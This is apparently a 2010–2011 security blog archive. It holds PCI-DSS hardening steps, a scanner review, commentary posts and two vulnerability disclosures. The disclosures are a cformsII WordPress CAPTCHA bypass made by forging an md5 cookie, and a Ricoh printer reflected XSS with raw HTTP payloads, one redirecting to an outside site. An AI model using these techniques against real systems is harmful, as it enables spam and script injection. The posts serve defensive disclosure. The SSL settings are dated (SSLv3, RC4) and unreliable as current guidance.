Showing posts with label vulnerabilities. Show all posts
Showing posts with label vulnerabilities. Show all posts

Friday, 21 January 2011

Two must haves for PCI-DSS

For better or worse, my life revolves around PCI-DSS these days. As I move along through the realm of PCI-Compliance, I thought I would start sharing some observations. I am going to start today with two standards that should be implemented to save you a lot of time and energy. If you have these in place before you start your vulnerability scanning, you won’t have to deal with an avalanche of results from these issues.

1.       Disable SSHv1 Support. Version 1 of the SSH protocol is prone to a number of issues. For this reason, it has been essentially abandoned in favour of SSHv2. I have included instructions for disabling SSHv1 in a few of the more common setups.

a.      OpenSSH

                                                              i.      Edit the sshd_config file. This file is normally located in /etc/ssh/ .
                                                            ii.      Change the line that reads Protocol 1,2  so that it instead reads Protocol 2
                                                          iii.      Restart the SSHD Service

b.     Cisco

                                                              i.      Enter the command ip ssh version 2
                                                            ii.      This will enable SSH v2 and disable SSH v1 when SSH is already configured.

c.      F5 Big-IP 4.x

                                                              i.      Log in to the BIG-IP command line.
                                                            ii.      Change directories to the /config/ssh directory by typing the following command:
                                                          iii.      cd /config/ssh
                                                           iv.      Use a text editor to edit the sshd_config file.
                                                             v.      Edit the Protocol entry used to configure the SSH versions supported by sshd daemon by replacing #Protocol 2,1with Protocol 2.
                                                           vi.      Save the sshd_config file.
                                                         vii.      Restart sshd by typing the following command:
                                                       viii.      bigstart restart sshd

2.       Enforce Strong SSL Encryption. There is a little more to this step than the previous one. Enforcing strong Cryptographic standards in general is extremely important. Right now we’re just going to talk about how to enforce proper usage of SSL on IIS and apache web servers.

a.      Apache 2.x

                                                              i.      Disable SSL 2.0 support
                                                            ii.      Disable weak ciphers
                                                          iii.      Disable MD5 Hashing for MAC
                                                           iv.      Disable Null Authentication
                                                             v.      To accomplish this include the following lines in the httpd.conf file:
·   SSLProtocol –ALL +SSLv3 +TLSv1
·   SSLCipherSuite  ALL:!aNULL:!ADH:!eNULL:!LOW:!MD5:!EXP:RC4+RSA:+HIGH:+MEDIUM

b.     Windows/IIS

                                                              i.      Enforce the use of SSL 3.0 and TLS by disabling support for PCT 1.0 and SSL 2.0
1.       Find HKey_Local_Machine\System\CurrentControlSet\Control\SecurityProviders \SCHANNEL\Protocols\PCT 1.0\Server in the registry
2.       Add a new DWORD called ‘Enabled’ and set this to 0x00000000
3.       Find HKey_Local_Machine\System\CurrentControlSet\Control\SecurityProviders \SCHANNEL\Protocols\SSL 2.0\Server
4.       Add a new DWORD called ‘Enabled’ and set this to 0x00000000

                                                            ii.      Disable all weak(less than 128-bit) ciphers
1.     Add a DWORD value called “Enabled”, set to 0x000000 to the following keys:
2.     SCHANNEL\Ciphers\RC4 128/128
3.     SCHANNEL\Ciphers\RC2 128/128
4.     SCHANNEL\Ciphers\RC4 64/128
5.     SCHANNEL\Ciphers\RC4 56/128
6.     SCHANNEL\Ciphers\RC2 56/128
7.     SCHANNEL\Ciphers\RC4 40/128
8.     SCHANNEL\Ciphers\RC2 40/128
9.     SCHANNEL\Ciphers\NULL
                                        iii.    Add a DWORD value called “Enabled”, set to 0xffffffff to the following keys:
1.     SCHANNEL\Ciphers\DES 56/56
2.     SCHANNEL\Ciphers\Triple DES 168/168
3.     SCHANNEL\KeyExchangeAlgorithms\PKCS
                                        iv.    Enforce the use of SHA hashes instead of MD5
1.       Add a DWORD value called “Enabled”, set to 0x000000, to SCHANNEL\Hashes\MD5
2.       Add a DWORD value called “Enabled”, set to 0xffffffff, to SCHANNEL\Hashes\SHA
                                                             v.      A reboot of the Machine is now required for the changes to take effect.

These two little things can save you a huge amount of work if you implement them.  When you go to run a PCI-DSS mandated vulnerability scan, these items will trip you up if you’re not careful. Get them implemented early; have them set as a standard, and save yourself a lot of headache.

Wednesday, 15 December 2010

cformsII CAPTCHA Bypass Vulnerability

The cformsII plugin for WordPress contains a vulnerability within its Captcha Verification functionality. This vulnerability exists due to an inherent trust of user controlled input. An attacker could utilise this vulnerability to completely bypass the captcha security mechanism on any wordpress forms created with this plugin.

Captcha Generation:
CformsII generates it's captcha by randomly selecting characters from a character set of ak,m,n,p-z2-9. I assume that the letters l and o, and the numerals 1 and 0 were excluded to avoid any confusion when rendered as an image. It selects a random number of these characters based on preset minimum and maximum limits, and assembles a string of them. It then creates an md5 hash of this string, prepends 'i+' to the hash and sets it as a cookie called 'turing_string_'. See the below code excerpts:
----------------------
$min = prep( $_REQUEST['c1'],4 );
$max = prep( $_REQUEST['c2'],5 );
$src = prep( $_REQUEST['ac'], 'abcdefghijkmnpqrstuvwxyz23456789');
----------------------

### captcha random code
$srclen = strlen($src)-1;
$length = mt_rand($min,$max);

$turing = '';
for($i=0; $i<$length; $i++)
$turing .= substr($src, mt_rand(0, $srclen), 1);

$tu = ($_REQUEST['i']=='i')?strtolower($turing):$turing;

setcookie('turing_string_'.$no, $_REQUEST['i'].'+'.md5($tu),(time()+60*60*5),"/");
--------------------------

This cookie is set when the user is presented with generated captcha image. When they submit their completed form, the capctha code is submitted in a POST parameter titled 'cforms_captcha'. This parameter is then md5'd and compared to the md5 value from the turing_string_ cookie. If the two hashes match, then it is considered to be valid.

-------------------------
else if( $field_type == 'captcha' ){  ### captcha verification

         $validations[$i+$off] = 1;

$a = explode('+',$_COOKIE['turing_string_'.$no]);

$a = $a[1];
$b = md5( ($captchaopt['i'] == 'i')?strtolower($_REQUEST['cforms_captcha'.$no]):$_REQUEST['cforms_captcha'.$no]);

if ( $a <> $b ) {
$validations[$i+$off] = 0;
$err = !($err)?2:$err;
}

}
-----------------------

The end result is that an attacker could pre-set a 'valid' captcha string. They then get the md5 hash of the string, and prepend “i%2b” (url encoded 'i+') to the value and set that as the turing_string_ cookie for their post requests. Every request set with this parameter and cookie combination will be inherently trusted as valid from the Captcha standpoint.

The problem here is two fold. The first issue, is that the captcha codes are not one time use codes, as they should be. So even without tricking the Captcha system in the first place, it would be possible to launch  a replay attack against this system to generate large amounts of submissions. Each captcha code should only be valid for one use and only during a very limited time window.

The second problem is the trust of user supplied data. The process is meant to create a validation of entered data against another piece of data. However both sets of data are freely offered up to the client-side for tampering. This completely negates the verification process as the server side is not truly in control of the validation at this point.

The take-away:
using cookies to store captcha data then comparing against user supplied input is not an appropriate method of validation for a number of reasons. The captcha code, whether in raw form or hashed should be stored server side for validation, should be valid for only one use, and should be valid only for a limited timeframe. This could be done by using an in-memory array, a database, or even a flatfile.

Tuesday, 9 November 2010

Ricoh Web Image monitor 2.03 Reflected XSS Vuln

I was poking at some Ricoh MFPs several days ago, when I found this. It is nothing to get to terribly excited about as it's just a reflected XSS. However, the ability to abuse any trusted internal IP should be treated as a threat. Companies have taken big hits from less. So without further ado, here are the petty little details:

Fun with Redirects:
My inital test was just an abuse of the redirect functionality that is being exploited for the vector.
GET /?";location.href="http://cosine-security.blogspot.com HTTP/1.1

HTTP/1.0 200 OK
Date: Tue, 09 Nov 2010 17:58:00 GMT
Server: Web-Server/3.0
Content-Type: text/html; charset=UTF-8
Content-Length: 683
Expires: Tue, 09 Nov 2010 17:58:00 GMT
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: cookieOnOffChecker=on; path=/
Connection: close

<html><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="refresh" content="1; URL=/web/guest/en/websys/webArch/message.cgi?messageID=MSG_JAVASCRIPTOFF&buttonURL=/../../../">
<meta http-equiv="Cache-Control" content="no-cache">
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="Expires" content="-1">
<title>Web Image Monitor</title>
<script language="javascript">
<!--
function jumpPage(){
self.document.cookie="cookieOnOffChecker=on; path=/";
location.href="/web/guest/en/websys/webArch/mainFrame.cgi?";location.href="http://cosine-security.blogspot.com";
}
// -->
</script>
</head>
<body onLoad="jumpPage()"></body>
</html>


A more traditional XSS test will still work just as well of course:

Traditional Test:
GET /?--></script><script>alert(51494)</script> HTTP/1.1


HTTP/1.0 200 OK
Date: Fri, 29 Oct 2010 17:43:19 GMT
Server: Web-Server/3.0
Content-Type: text/html; charset=UTF-8
Content-Length: 672
Expires: Fri, 29 Oct 2010 17:43:19 GMT
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: cookieOnOffChecker=on; path=/
Connection: close

<html><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="refresh" content="1; URL=/web/guest/en/websys/webArch/message.cgi?messageID=MSG_JAVASCRIPTOFF&buttonURL=/../../../">
<meta http-equiv="Cache-Control" content="no-cache">
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="Expires" content="-1">
<title>Web Image Monitor</title>
<script language="javascript">
<!--
function jumpPage(){
self.document.cookie="cookieOnOffChecker=on; path=/";
location.href="/web/guest/en/websys/webArch/mainFrame.cgi?--></script><script>alert(51494)</script>";
}
// -->
</script>
</head>
<body onLoad="jumpPage()"></body>

Saturday, 26 June 2010

Tavis Ormandy's Full Disclosure: Just the facts ma'am

Everybody has been talking about Tavis Ormandy's disclosure of a Windows Help Centre Vulnerability. There has been very heated debate going around. In some cases the word debate is a little generous. There has been a lot of name calling, mud slinging, and general ad hominem nonesense. People are trashing Tavis, Microsoft, and even Robert Hansen now. It's gotten a little out of hand. What I have noticed is a lack of real substantiated facts in these arguments. To that end, I have made an effort to contact both involved parties, Tavis Ormandy, and the MSRC. I am hoping that they will be willing to respond with some of the facts surrounding this occurrence., and maybe we'll hear a little bit of tempered truth, instead of everyone's emotionally charged bickering. Of course, the chances that either Tavis or the MSRC will be bothered to respond to me are probably not great, here's hoping.

UPDATE: I have heard back from Mr. Ormandy. He was very polite but has stated that he would prefer to let the issue rest than answer anymore questions. Since I am unable to present his side of the argument, even if I were to hear comment back from Microsoft, I would feel it impossible to present an unbiased view here. therefore I shall just let it drop. Perhaps that is really what we all just need to do. If you think he was right, then silently cheer him on, if you think he was wrong admit that maybe he made a mistake, and move on.

Friday, 23 April 2010

NetSparker Community Edition Review

For those of you who do not follow DarkNET , it is a well run blog where they add their perspective on security news and events. They also post a never ending stream of new tools and updates. They area great resource for keeping up to date on the latests toys and tools. They have come through for me once again by introducing me to  Netsparker Community Edition. The last fire and forget web scanner I was enticed to check out in this manner was a horrible flop. It was called Acunetix, perhaps you've heard of it? If you haven't don't bother, it's rubbish.

So as you can imagine I was not expecting great things from Netsparker. However, as I was downloading it I noticed that RSnake had also posted about it. Like many people in my field, I tend to have an ego, but when RSnake speaks, I listen. So I installed the community edition and gave it some quick run through. As expected, many of the best features are turned off in the freebie version, but that's okay. They left enough good stuff in there to whet my appetite(good job marketing guys). So here are the things I noticed right off the bat:

  1. The User Interface is very simple and straight forward. This is usually my first indication of a problem. In my experience, good products in this space tend to have absolutely wretched interfaces. they are tormented things that will try to bend your mind to it's will and subjugate you completely. The interface here is so simple most anyone could walk through setting up a scan. 
  2. The User Interface makes sense. Acunetix is a perfect example of the simplistic but terrible User Interface. It is very simple, but anything but straightforward. Trying to understand how to make it do some of the things you'd like it to do is not an easy task. Netsparker does not suffer these issues. It presents you with almost everything you could possibly need and even more importantly, nothing you don't.
  3. The sucker is FAST. I typically use IBM's Rational Appscan product. While AppScan is a good product, fast is never an adjective I would use to describe it. Netsparker is fast. Now part of why it is so fast is because the test profile is so limited in the community edition. So let's just look at the crawler. A 964 url page took appscan just over an hour to crawl. NetSparker did it in 15 minutes. It then ran all of it's tests in another 20-30 minutes. It may be that we will see these speeds drop dramatically with the full version, due to the expanded test profile.
  4. SQLi right away. One of the apps I tested it on had SQL Injection right on the login page. AppScan had failed to detect it, but manual testing revealed it inside 10 minutes. Netsparker caught it immediately. While this is far from a comprehensive look at it's detection rates, I say bravo to netsparker.
  5. Thoroughness. This is hard to gauge because it is the limited version. It FEELS like it is not very thorough. Part of this is psychological, because it runs so fast. Part of it is because it doesn't find some things because it is the 'community edition'. I can't shake the feeling that it is not being thorough, but I would really have to test the full version to make any honest assessment of this. 
  6. No False positives, sorta. I performed several test scenarios, and it did not really generate false positives. The ambiguous language here is due to what I think is a very neat feature. On one of the test sites I saw a distinction in the results between 'we know there is cross-site scripting' and 'we think there might be'. I appreciate that it is extremely difficult to eliminate false positives, and I think this approach is great.
  7. Testing framework. I have talked about this before, and I will talk about it again. We need to see testing harnesses, not just pas scanners. Once you are done with the scan, in Netsparker, it has tools you can use within the app to attempt to exploit the vulnerabilities. If you find a possible SQLi there is an actual injection tool built into the scanner to allow you to try and exploit it. It has similar tools for LFI and Command Injection. This, to my mind, represents the absolute right direction for these types of products to be heading in.
  8. Pricetag. The community edition is free but limited. They then have two unlocked versions. The standard and enterprise edition. the key difference being the number of sites licensed for. I'm not sure if this means you predefine what sites you are licensed for or what. However, the unlimited Enterprise Edition comes with a pricetag of only $3000, which is extremely reasonable in my opinion. It also makes the product worthwhile even as a second scanner. I am considering recommending we purchase an Enterprise license so that we can have two scanners to see if we catch anything with one that we don't with the other. 
So let me summarize briefly. The Community Edition of Netsparker shows some very significant promise. It would seem to indicate a well thought out and well developed product. However, for professional assessments I would definitely recommend you not try to use the Community Edition.  Without having tested the Enterprise Edition, I won't recommend it out of hand, but at a pricetag of only $3000, it seems like a good idea.

Netsparker Community edition is created by Mavituna Security, and can be downloaded here.

Monday, 8 March 2010

This is just sad

So I was taking a poke at a friend's server, doing a preliminary sweep for them. I noticed that they were running filezilla 0.9.33 and so I did a quick google search for "filezilla 0.9.33 vuln". What I came up with scared me a little bit. It wasn't that I found some huge gaping vulnerability, but rather a level of ignorance from one of filezilla's forum admins that was simply astounding. Yuo can see the forum thread here , and find the CVE for the vulnerability being discussed here. The vulnerability that is being discussed is an information disclosure with the getcwd() function.

The site admin, botg, replies "What is FTP getcwd()? There's no such thing". Botg seems to think that this posting is about misuse of an ftp protocol command. He is then presented, by another user, with the CVE for this vulnerability. He then replies "Thank you, I know how to use Google. Doesn't change the fact that there's no such thing as FTP getcwd(), whatever that means". This is the statement, that more than anything else, blows me away.

In the scan results the original user posted it says
Details: The FTP daemon exhibits a descriptor leak in the getcwd (get current working directory) function.
Extra info: None.
Fix: Upgrade your libc C library to the current version.
And in botg's reply, he even includes the function brackets when referring to getcwd. Funny botg, that sure looks like a programming function call, now doesn't it? His snarky reply even sews the seeds of his own demise. "I know how to use google". Oh really? Let me help you out . As the first link describes the C function getcwd() I would say you seem to have some problems using google after all. I would also say, that you obviously have no understanding of how software vulnerabilities happen. If you think that vulnerabilities happen by some command the user can just type in and "hack the gibson", you need to stop watching TV mate. "It's not my job to know these things" you might say. No, but you are in the position of helping users, and this one came to you with a question. Rather than doing any decent amount of research, you opened your mouth and inserted your foot. Let's forget the whole Google bit, or the fact that it is immediately obvious that this is a C function call. I once again point you to the scan results the user posted:

Fix: Upgrade your libc C library to the current version.

Hrm, I wonder if that might provide a clue as to what's going on here? If this is the level of support a filezilla user can expect, I feel very sorry for them.

Update: I decided to register for their forums, so i could post some useful advice to this thread. I would take the high road, instead of just sitting back and being snarky myself. Imagine my surprise when my confirmation email comes in to activate my account, and my username and password are both on it in plaintext...uggggg. These people make me want to cry!

Wednesday, 3 March 2010

Lessons Learned: Self-referencing local file includes...

So I had a small incident at work today. I found a perl cgi script that had a local file include/os command injection vulnerability on it. After confirming this vulnerability, i decided to try and pull the source code for the vulnerable script, and the system choked. When I went to try something else, I was greeted by an ugly apache 500 server error. At first I just frowned and went back to a command string I had already validated worked. 500 error again. apparently somewhere in the mix, I am unsure if it is apache itself, mod_perl, or a condition created on the OS level, did not like the script trying to read itself and return it back out through apache. I suppose you could class this as an inadvertent denial of service attack